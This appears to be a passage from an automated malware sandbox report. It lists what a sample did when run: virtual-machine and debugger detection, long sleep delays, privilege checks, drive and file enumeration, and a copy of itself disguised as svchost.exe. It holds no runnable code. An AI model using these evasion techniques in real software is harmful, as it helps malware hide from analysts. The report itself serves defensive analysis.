Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date1_2_00403A20
Found evasive API chain (may stop execution after checking volume information)
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_1-30506
Found evasive API chain checking for user administrative privileges
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_1-30539
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\apppatch\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLLJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeFile opened / queried: C:\Users\user\Desktop\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\system\vmhgfs.DLLJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00401B20 rdtsc 1_2_00401B20
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,22_2_012F78A0
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 953Jump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,22_2_012F79D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015A79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,25_2_015A79D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AF79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,27_2_00AF79D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012B79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,29_2_012B79D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_011279D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,31_2_011279D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_013079D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,33_2_013079D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeAPI coverage: 2.2 %
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeAPI coverage: 2.2 %
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeAPI coverage: 2.2 %
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeAPI coverage: 2.2 %
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeAPI coverage: 2.2 %
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeAPI coverage: 2.2 %
Source: C:\Windows\apppatch\svchost.exe TID: 8076Thread sleep count: 953 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 8076Thread sleep time: -95300s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 4524Thread sleep count: 139 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 6200Thread sleep count: 140 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7912Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012FD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,22_2_012FD120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01309910 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,22_2_01309910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_0130DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,22_2_0130DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_0130DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,22_2_0130DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012FE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,22_2_012FE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012E7680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,22_2_012E7680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015B9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,25_2_015B9910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015AD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,25_2_015AD120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015BDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,25_2_015BDA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015BDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,25_2_015BDAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01597680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,25_2_01597680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015AE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,25_2_015AE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AFD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,27_2_00AFD120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B09910 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,27_2_00B09910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B0DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,27_2_00B0DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B0DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,27_2_00B0DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AFE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,27_2_00AFE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AE7680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,27_2_00AE7680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012BD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,29_2_012BD120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012C9910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,29_2_012C9910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012CDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,29_2_012CDA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012CDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,29_2_012CDAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012BE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,29_2_012BE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012A7680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,29_2_012A7680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01139910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,31_2_01139910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0112D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,31_2_0112D120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0113DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,31_2_0113DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0113DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,31_2_0113DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01117680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,31_2_01117680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0112E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,31_2_0112E6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0130D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,33_2_0130D120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01319910 OpenMutexA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,33_2_01319910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0131DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,33_2_0131DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0131DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,33_2_0131DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0130E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,33_2_0130E6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012F7680 OpenMutexA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,33_2_012F7680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012FD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,22_2_012FD120
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 00000002.00000003.1341912346.00000000008A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\apppatch\svchost.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
